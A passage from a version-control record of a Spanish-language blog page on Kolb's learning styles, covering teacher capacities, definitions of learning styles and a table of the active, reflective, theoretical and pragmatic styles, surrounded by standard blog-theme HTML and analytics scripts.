psicomotriz.<\/p>\n<\/li>\n<li>\n<p>Capacidad comunicativa: habilidad para lograr la mediaci\u00f3n entre el aprendizaje y la ense\u00f1anza.Se evidencia en el uso de los diferentes tipos de lenguaje que posibiliten al estudiante apropiarse del conocimiento y hacer su propia construcci\u00f3n significativa, lo que les permitir\u00e1 aprender para la vida.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00fadica: capacidad que permite dise\u00f1ar y aplicar diversas estrategias de ense\u00f1anza-aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad metacognitiva: capacidad para evaluar el proceso ense\u00f1anza-aprendizaje en dos v\u00edas: hacia los alumnos verificando avances y estableciendo medidas correctivas, pero adem\u00e1s hacia su propio desempe\u00f1o como docente, lo que le permitir\u00e1 mejorar d\u00eda a d\u00eda en su profesi\u00f3n.<\/p>\n<\/li>\n<\/ol>\n<\/div>\n<div class=\"paragraph\">\n<p>Si nosotros como docentes contamos con estas habilidades, aseguraremos un buen trabajo con nuestros estudiantes.<\/p>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"__qu_son\">\u00bfQu\u00e9 son?<\/h3>\n<div class=\"paragraph\">\n<p>Se definen como las distintas maneras en que un individuo puede aprender; para Alonso y Gallego (1994) los estilos de aprendizaje son los rasgos cognitivos, afectivos y fisiol\u00f3gicos que sirven como indicadores relativamente estables de c\u00f3mo los alumnos perciben interacciones y responden a sus ambientes de aprendizaje.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Se cree que todas las personas emplean un m\u00e9todo particular de interacci\u00f3n, aceptaci\u00f3n y procesado de est\u00edmulos e informaci\u00f3n. Las caracter\u00edsticas sobre estilo de aprendizaje suelen formar parte de cualquier informe psicopedag\u00f3gico que se elabore sobre un estudiante, y debiera ser el fundamento de las estrategias did\u00e1cticas y refuerzos pedag\u00f3gicos para que estos sean los m\u00e1s adecuados para el alumno.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Los diversos investigadores que han propuesto alg\u00fan estilo de aprendizaje en cierto difieren de los componentes de los estilos de aprendizaje; sin embargo estos ser\u00edan algunos de los m\u00e1s empleados:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Condiciones ambientales<\/p>\n<\/li>\n<li>\n<p>Bagaje cultural<\/p>\n<\/li>\n<li>\n<p>Edad<\/p>\n<\/li>\n<li>\n<p>Preferencias de agrupamiento (se refiere a si se trabaja mejor individual-\nmente o en equipo)<\/p>\n<\/li>\n<li>\n<p>Estilo seguido para la resoluci\u00f3n de problemas<\/p>\n<\/li>\n<li>\n<p>Tipo de motivaci\u00f3n, locus de control interno o externo<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>El analizar los diferentes estilos de aprendizjae que tienen nuestros estudiantes sin lugar a dudas permitir\u00e1 que podamos tomar decisiones dirigidas a satisfacer cada necesidad singular en el grupo y con ellos que el conjunto de estudiantes logre la asimilizaci\u00f3n de conocimientos planificiada o quiz\u00e1s una superior.<\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_clasificaci_n\">Clasificaci\u00f3n<\/h3>\n<div class=\"paragraph\">\n<p>Los modelos existentes sobre estilos de aprendizaje ofrecen un marco conceptual para entender los comportamientos observados en el aula, los cuales brindan una\nexplicaci\u00f3n sobre la relaci\u00f3n de esos comportamientos con la forma en que est\u00e1n aprendiendo los alumnos y el tipo de estrategias de ense\u00f1anza que pueden resultar m\u00e1s eficaces en un momento determinado, ya sea por el contendido tem\u00e1tico en s\u00ed, o bien por las diversas interacciones sociales que se desarrollan en el aula.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera tenemos varias clasificaciones las cuales se muestran en la siguiente tabla:<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png\" alt=\"Calsificaci\u00f3n estilos de apredizaje\" width=\"800\" height=\"400 role=right\"><\/span><\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_modelo_de_kolb\">Modelo de Kolb<\/h3>\n<div class=\"paragraph\">\n<p>El aprendizaje experiencial progresa a trav\u00e9s de un ciclo de actividades a las que se conoce habitualmente como ciclo de aprendizaje de Kolb (David Kolb, 1984).<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El ciclo tiene cuatro componentes, cada uno de los cuales plantea retos concretos a la hora de planificar actividades acad\u00e9micas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg \" alt=\"ciclos modelo kolb\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Acorde este modelo una persona sulee establecer su estilo de aprendizaje en 1 o m\u00e1ximo 2 de estas fases y de esta menera podemos clasificar a nuestros estudiantes acorde la fase que prefieran trabajar.<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Activo<\/p>\n<\/li>\n<li>\n<p>Reflexivo<\/p>\n<\/li>\n<li>\n<p>Te\u00f3rico<\/p>\n<\/li>\n<li>\n<p>Pragm\u00e1tico<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_car_ter_sticas_de_cada_estilo\">Car\u00e1ter\u00edsticas de cada estilo<\/h3>\n<div class=\"paragraph\">\n<p>Para lograr proponer\/emplear estrategias de aprendizaje apropiadas para cada estilo revisemos las caracter\u00edsticas de cada uno:<\/p>\n<\/div>\n<table class=\"tableblock frame-all grid-all\">\n<caption class=\"title\">Table 1. Caracter\u00edsticas Estilos de parendizaje modelo Kolb<\/caption>\n<colgroup>\n<col>\n<col>\n<col>\n<col>\n<\/colgroup>\n<thead>\n<tr>\n<th class=\"tableblock halign-left valign-top\">Estilo<\/th>\n<th class=\"tableblock halign-left valign-top\">Caracter\u00edstica General<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando facilita el aprendizaje<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando NO facilita el aprendizaje.<\/th>\n<\/tr>\n<\/thead>\n<tfoot>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Pr\u00e1gm\u00e1ticos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Gustan de poner en pr\u00e1ctica las ideas, teor\u00edas, t\u00e9cnicas nuevas y verificar su funcionamiento, forma de uso\/aplicaci\u00f3n. Generan\/buscan ideas y las ejecutan inmediatamente. Se basan en la realidad para plantear alternativas a fin de de tomar decisiones sobre algo. Buscan desaf\u00edos, replantear algo con una diferente perspectiva. Discuten un tema brevemenete, les aburren los debates largos. <strong>La pregunta que quieren responder es: <em>\u00bfQu\u00e9 pasar\u00eda si?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades que enlacen la teor\u00eda con la pr\u00e1ctica. Visualizan trabajo\/movimiento\/acci\u00f3n. Posibilidad de aplicaci\u00f3n de algo aprendido.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando todo queda en teor\u00eda. Lo aprendido no se vincula con la realidad o necesidades puntuales. Actividades que no se identifique una finalidad con claridad.<\/p><\/td>\n<\/tr>\n<\/tfoot>\n<tbody>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Activos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Se involucran totalmente y sin prejuicios en las experiencias nuevas.\nDisfrutan el momento y cada acontecimiiento. Entusiastas ente lo nuevo. Actuan primero y luego piensan en las consecuencias. Disfrutan trabajando en equipo siendo el eje del grupo. Les aburre planificar a largo plazo y consolidar poryectos.\n<strong>La pregunta que buscan responder en el aprendizaje es: <em>\u00bfC\u00f3mo?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Plantendo actividades desafiantes . Actividades de resultados immediatos o a corto plazo. Actividades activas de emoci\u00f3n, drama, acci\u00f3n.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Siendo pasivos. Demasiado an\u00e1lisis de un tema o mucha reflexi\u00f3n sobre algo. Trabajo individual.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Reflexivo<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adoptan una postura observadora de an\u00e1lsis en base a datos, experiencias desde varias perpectivas.Establecen conclusiones en base a argumentos s\u00f3lidos y convincentes. Son precavidos y analizan todas las implicaciones de cualquier acci\u00f3n antes de ponerse en\nmovimiento. En las reuniones observan y escuchan antes de hablar procurando pasar desapercibidos. <strong>La pregunta que quieren responder con el aprendizaje es: <em>\u00bfPor qu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando pueden tener una postura de observador. Analizar situaciones. Se les facilita informaci\u00f3n o datos. Tienen tiempo para reflexionar antes de actuar.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Se exigen ser centro o eje de atenci\u00f3n. Actividades de soluci\u00f3n inmediata. Improvisaci\u00f3n sobre algo. Actividades que le apresuren.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Te\u00f3ricos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adaptan e intergran las teor\u00edas o fundamentos de forma l\u00f3gica. Organizan las cosas de forma secuencial, integrada y coherente. Analizan y sintetizan informaci\u00f3n de forma racional. No son subjetivos ni il\u00f3gicos. <strong>La pregutna que quieren responder es: <em>\u00bfQu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando se parte de teor\u00edas, modelos, sistemas. Ideas o conceptos desafiantes. Actividades que propicien la indagaci\u00f3n o cuestionamientos.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades abiguas o que generen incertidumbre. Actividades\/situaciones que prioricen sentimientos o emociones. Cuando no se les facilita la teor\u00eda o bases conceptuales.<\/p><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div class=\"admonitionblock note\">\n<table>\n<tr>\n<td class=\"icon\">\n<i class=\"fa icon-note\" title=\"Note\"><\/i>\n<\/td>\n<td class=\"content\">\nEste valor de 3274 d\u00f3lares es el cambio del euro (3000) a dolar.\n<\/td>\n<\/tr>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n <\/section>\n\n <\/article>\n\n \n <section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'marchelo2212'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n <\/section>\n \n\n\n\n <footer class=\"footer\">\n <span class=\"footer__copyright\">© 2016. All rights reserved.<\/span>\n <span class=\"footer__copyright\"><a href=\"http:\/\/uno.daleanthony.com\" title=\"link to page for Uno Ghost theme\">Uno theme<\/a> by <a href=\"http:\/\/daleanthony.com\" title=\"link to website for Dale-Anthony\">Dale-Anthony<\/a><\/span>\n <span class=\"footer__copyright\">Proudly published with <a href=\"http:\/\/hubpress.io\" title=\"link to Hubpress website\">Hubpress<\/a><\/span>\n <\/footer>\n <\/div>\n <\/div>\n\n <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad(); \n <\/script>\n\n <script type=\"text\/javascript\" src=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/js\/main.js?v=1.0.0\"><\/script>\n \n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-70778105-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n<\/body>\n<\/html>\n","old_contents":"<!DOCTYPE html>\n<html>\n<head>\n <meta charset=\"utf-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" \/>\n\n <title>Los estilos de aprendizaje de Kolb - Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta property=\"og:description\" content=\"\">\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/css\/uno.css?v=1.0.0\" \/>\n\n <link rel=\"canonical\" href=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <meta property=\"og:site_name\" content=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" \/>\n <meta property=\"og:type\" content=\"article\" \/>\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta property=\"og:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta property=\"og:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n <meta property=\"article:published_time\" content=\"Invalid date\" \/>\n <meta property=\"article:modified_time\" content=\"2016-07-30T17:54:22.733Z\" \/>\n <meta property=\"article:tag\" content=\"e-learning\" \/>\n <meta property=\"article:tag\" content=\"innovaci\u00f3n\" \/>\n <meta property=\"article:tag\" content=\"estilos de aprendizaje\" \/>\n <meta property=\"article:tag\" content=\"TIC\" \/>\n <meta property=\"article:tag\" content=\"educaci\u00f3n\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta name=\"twitter:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta name=\"twitter:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <script type=\"application\/ld+json\">\n{\n \"@context\": \"http:\/\/schema.org\",\n \"@type\": \"Article\",\n \"publisher\": \"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\",\n \"author\": {\n \"@type\": \"Person\",\n \"name\": \"Marcelo Sotaminga\",\n \"image\": \"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\",\n \"url\": \"undefined\/author\/undefined\",\n \"sameAs\": null\n },\n \"headline\": \"Los estilos de aprendizaje de Kolb\",\n \"url\": \"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\",\n \"datePublished\": \"Invalid date\",\n \"dateModified\": \"2016-07-30T17:54:22.733Z\",\n \"keywords\": \"e-learning, innovaci\u00f3n, estilos de aprendizaje, TIC, educaci\u00f3n\",\n \"description\": \"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\"\n}\n <\/script>\n\n <meta name=\"generator\" content=\"Ghost ?\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" href=\"https:\/\/marchelo2212.github.io\/rss\" \/>\n <link rel=\"stylesheet\" href=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/styles\/default.min.css\">\n\n<\/head>\n<body class=\"post-template tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion no-js\">\n\n <span class=\"mobile btn-mobile-menu\">\n <i class=\"icon icon-list btn-mobile-menu__icon\"><\/i>\n <i class=\"icon icon-x-circle btn-mobile-close__icon hidden\"><\/i>\n <\/span>\n\n <header class=\"panel-cover panel-cover--collapsed \" >\n <div class=\"panel-main\">\n \n <div class=\"panel-main__inner panel-inverted\">\n <div class=\"panel-main__content\">\n \n <h1 class=\"panel-cover__title panel-title\"><a href=\"https:\/\/marchelo2212.github.io\" title=\"link to homepage for Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\">Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/a><\/h1>\n <hr class=\"panel-cover__divider\" \/>\n <p class=\"panel-cover__description\">Sitio dedicado a recopilar las cosas que he realizado en algunos lados, para poder tenerlas todas un poco ordenadas, aqu\u00ed encontrar\u00e1s cosas referente a:\n Software Libre - GNU \/ Linux\n Innovaci\u00f3n Educativa\n Ciencia y Tecnolog\u00eda\n Entre otras....\n <\/p>\n <hr class=\"panel-cover__divider panel-cover__divider--secondary\" \/>\n \n <div class=\"navigation-wrapper\">\n \n <nav class=\"cover-navigation cover-navigation--primary\">\n <ul class=\"navigation\">\n <li class=\"navigation__item\"><a href=\"https:\/\/marchelo2212.github.io\/#blog\" title=\"link to Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s.. blog\" class=\"blog-button\">Blog<\/a><\/li>\n <\/ul>\n <\/nav>\n \n \n \n <nav class=\"cover-navigation navigation--social\">\n <ul class=\"navigation\">\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/www.facebook.com\/marchelo2212\" title=\"Facebook account\">\n <i class='icon icon-social-facebook'><\/i>\n <span class=\"label\">Facebook<\/span>\n <\/a>\n <\/li>\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/twitter.com\/Marchelo2212\" title=\"Twitter account\">\n <i class='icon icon-social-twitter'><\/i>\n <span class=\"label\">Twitter<\/span>\n <\/a>\n <\/li>\n \n <!-- Google Plus -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/plus.google.com\/u\/0\/+MarceloSotaminga\" title=\"Google+ account\">\n <i class='icon icon-social-google-plus'><\/i>\n <span class=\"label\">Google-plus<\/span>\n <\/a>\n <\/li>\n \n \n \n \n \n <!-- LinkedIn -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/ec.linkedin.com\/in\/marcelo-sotaminga-9ab64562\" title=\"LinkedIn account\">\n <i class='icon icon-social-linkedin'><\/i>\n <span class=\"label\">LinkedIn<\/span>\n <\/a>\n <\/li>\n \n <!-- Email -->\n <li class=\"navigation__item\">\n <a href=\"mailto:marcelo@openmailbox.org\" title=\"Email marcelo@openmailbox.org\">\n <i class='icon icon-mail'><\/i>\n <span class=\"label\">Email<\/span>\n <\/a>\n <\/li>\n \n <\/ul>\n <\/nav>\n \n \n <\/div>\n \n <\/div>\n \n <\/div>\n \n <div class=\"panel-cover--overlay\"><\/div>\n <\/div>\n <\/header>\n\n <div class=\"content-wrapper\">\n <div class=\"content-wrapper__inner\">\n \n\n <article class=\"post-container post-container--single\">\n\n <header class=\"post-header\">\n <div class=\"post-meta\">\n <time datetime=\"Invalid date\" class=\"post-meta__date date\">Invalid date<\/time> • <span class=\"post-meta__tags tags\">on <a href=\"https:\/\/marchelo2212.github.io\/tag\/e-learning\">e-learning<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/innovacion\"> innovaci\u00f3n<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/estilos-de-aprendizaje\"> estilos de aprendizaje<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/TIC\">TIC<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/educacion\"> educaci\u00f3n<\/a><\/span>\n <span class=\"post-meta__author author\"><img src=\"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\" alt=\"profile image for Marcelo Sotaminga\" class=\"avatar post-meta__avatar\" \/> by Marcelo Sotaminga<\/span>\n <\/div>\n <h1 class=\"post-title\">Los estilos de aprendizaje de Kolb<\/h1>\n <\/header>\n\n <section class=\"post tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion\">\n <div id=\"preamble\">\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos y responder a la diversidad de caracter\u00edsiticas de los mismo.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"sect1\">\n<h2 id=\"_estilos_de_aprendizaje\">Estilos de aprendizaje<\/h2>\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>El emplear metodolog\u00edas que apunten a mantener como eje central al estudiante deber\u00e1n tomar en cuenta la heterogeneidad del grupo y trabajar (planificando y aplicado) diversas estrategias did\u00e1ctiva que permitan justamente que todo el grupo genere un aprendizaje significativo. Para esto imprescindible el proponer actividades direccionadas a sus estilos de aprendizaje, por ello, se revisar\u00e1 algunas de ellas con sus caracter\u00edsticas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png\" alt=\"Estilos de aprendizaje\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Refiri\u00e9ndose al tema Laura Frade, articula ocho capacidades que deben tener los docentes, estas capacidades interact\u00faan entre s\u00ed para dar como resultado la \u00f3ptima formaci\u00f3n de los estudiantes:<\/p>\n<\/div>\n<div class=\"olist arabic\">\n<ol class=\"arabic\">\n<li>\n<p>Capacidad diagn\u00f3stica: capacidad de detectar las necesidades de aprendizaje del estudiante, alienearla a un estilo de aprendizaje y vincularla con una estrategia de aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad cognitiva: capacidad que guarda relaci\u00f3n con la adquisici\u00f3n del conocimiento necesario para impartir los contenidos tem\u00e1ticos.<\/p>\n<\/li>\n<li>\n<p>Capacidad \u00e9tica: capacidad que incide en la toma de decisiones del docente sobre su compromiso ante la sociedad, la responsabilidad de trabajo, los valores que promover\u00e1, los juicios de valor que emitir\u00e1, la priorizaci\u00f3n del desarrollo de los estudiantes, la preocupaci\u00f3n sobre su futuro laboral.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00f3gica: capacidad para organizar el contenido tem\u00e1ticos de forma l\u00f3gica-secuencial. Se demuestra por su, orden, graduaci\u00f3n y dosificaci\u00f3n.<\/p>\n<\/li>\n<li>\n<p>Capacidad emp\u00e1tica: capacidad que permite entender a los estudiantes en tres diferentes planos: afectivo, cognitivo y psicomotriz.<\/p>\n<\/li>\n<li>\n<p>Capacidad comunicativa: habilidad para lograr la mediaci\u00f3n entre el aprendizaje y la ense\u00f1anza.Se evidencia en el uso de los diferentes tipos de lenguaje que posibiliten al estudiante apropiarse del conocimiento y hacer su propia construcci\u00f3n significativa, lo que les permitir\u00e1 aprender para la vida.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00fadica: capacidad que permite dise\u00f1ar y aplicar diversas estrategias de ense\u00f1anza-aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad metacognitiva: capacidad para evaluar el proceso ense\u00f1anza-aprendizaje en dos v\u00edas: hacia los alumnos verificando avances y estableciendo medidas correctivas, pero adem\u00e1s hacia su propio desempe\u00f1o como docente, lo que le permitir\u00e1 mejorar d\u00eda a d\u00eda en su profesi\u00f3n.<\/p>\n<\/li>\n<\/ol>\n<\/div>\n<div class=\"paragraph\">\n<p>Si nosotros como docentes contamos con estas habilidades, aseguraremos un buen trabajo con nuestros estudiantes.<\/p>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"__qu_son\">\u00bfQu\u00e9 son?<\/h3>\n<div class=\"paragraph\">\n<p>Se definen como las distintas maneras en que un individuo puede aprender; para Alonso y Gallego (1994) los estilos de aprendizaje son los rasgos cognitivos, afectivos y fisiol\u00f3gicos que sirven como indicadores relativamente estables de c\u00f3mo los alumnos perciben interacciones y responden a sus ambientes de aprendizaje.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Se cree que todas las personas emplean un m\u00e9todo particular de interacci\u00f3n, aceptaci\u00f3n y procesado de est\u00edmulos e informaci\u00f3n. Las caracter\u00edsticas sobre estilo de aprendizaje suelen formar parte de cualquier informe psicopedag\u00f3gico que se elabore sobre un estudiante, y debiera ser el fundamento de las estrategias did\u00e1cticas y refuerzos pedag\u00f3gicos para que estos sean los m\u00e1s adecuados para el alumno.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Los diversos investigadores que han propuesto alg\u00fan estilo de aprendizaje en cierto difieren de los componentes de los estilos de aprendizaje; sin embargo estos ser\u00edan algunos de los m\u00e1s empleados:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Condiciones ambientales<\/p>\n<\/li>\n<li>\n<p>Bagaje cultural<\/p>\n<\/li>\n<li>\n<p>Edad<\/p>\n<\/li>\n<li>\n<p>Preferencias de agrupamiento (se refiere a si se trabaja mejor individual-\nmente o en equipo)<\/p>\n<\/li>\n<li>\n<p>Estilo seguido para la resoluci\u00f3n de problemas<\/p>\n<\/li>\n<li>\n<p>Tipo de motivaci\u00f3n, locus de control interno o externo<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>El analizar los diferentes estilos de aprendizjae que tienen nuestros estudiantes sin lugar a dudas permitir\u00e1 que podamos tomar decisiones dirigidas a satisfacer cada necesidad singular en el grupo y con ellos que el conjunto de estudiantes logre la asimilizaci\u00f3n de conocimientos planificiada o quiz\u00e1s una superior.<\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_clasificaci_n\">Clasificaci\u00f3n<\/h3>\n<div class=\"paragraph\">\n<p>Los modelos existentes sobre estilos de aprendizaje ofrecen un marco conceptual para entender los comportamientos observados en el aula, los cuales brindan una\nexplicaci\u00f3n sobre la relaci\u00f3n de esos comportamientos con la forma en que est\u00e1n aprendiendo los alumnos y el tipo de estrategias de ense\u00f1anza que pueden resultar m\u00e1s eficaces en un momento determinado, ya sea por el contendido tem\u00e1tico en s\u00ed, o bien por las diversas interacciones sociales que se desarrollan en el aula.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera tenemos varias clasificaciones las cuales se muestran en la siguiente tabla:<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png\" alt=\"Calsificaci\u00f3n estilos de apredizaje\" width=\"800\" height=\"400 role=right\"><\/span><\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_modelo_de_kolb\">Modelo de Kolb<\/h3>\n<div class=\"paragraph\">\n<p>El aprendizaje experiencial progresa a trav\u00e9s de un ciclo de actividades a las que se conoce habitualmente como ciclo de aprendizaje de Kolb (David Kolb, 1984).<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El ciclo tiene cuatro componentes, cada uno de los cuales plantea retos concretos a la hora de planificar actividades acad\u00e9micas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg \" alt=\"ciclos modelo 